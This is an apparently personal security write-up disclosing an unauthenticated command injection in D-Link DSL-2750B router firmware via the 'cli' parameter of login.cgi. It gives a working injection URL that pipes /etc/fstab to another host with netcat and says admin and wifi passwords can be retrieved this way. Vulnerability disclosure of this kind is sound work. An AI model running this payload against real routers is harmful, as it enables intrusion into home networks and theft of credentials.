• Consulting
  • Information Security
  • Networking
  • Software Development
  • R&D
  • D-Link router DSL-2750B firmware 1.01 to 1.03 – RCE no auth

    21-01-2017

    After playing around a bit with my home router, I’ve noticed something interesting during login phase; user is redirected on error page by providing wrong credentials and the URL catch my eye:

    http://192.168.1.1:666/login.cgi?cli=access%20login%20encrypted%2041544A25DC00170BA90659AD4CBDD9D9$

    ZG1vU2t

    In order to see what’s happening, web server must be started on the router with the debug output enabled:

    tepy3XD

    Seems like arguments of “cli” parameter are the input of a binary that will execute that particular given command; the complete list of commands available are listed inside “/etc/ayecli/ayecli.cli” file on the router. (among them there’s a creepy “system halt” that will shutdown the router no matter what).

    Arguments are used in this way:

    ayecli -c ‘command-here’ 

    To execute remote arbitrary commands we must append ‘ , adding the command and another ‘ , in order to neutralize the substitution that is made with “$” with ‘ at the very end of the URL:

    ayecli -c ‘command’;injection”

    that is:

    http://192.168.1.1/login.cli?cli=hwget wpassphrase_2.4G’;nc 192.168.1.8 666 </etc/fstab’$


    nLFnWeo

    By exploiting this bug, is it possible to retrieve also cleartext admin password, wifi passphrase and so on.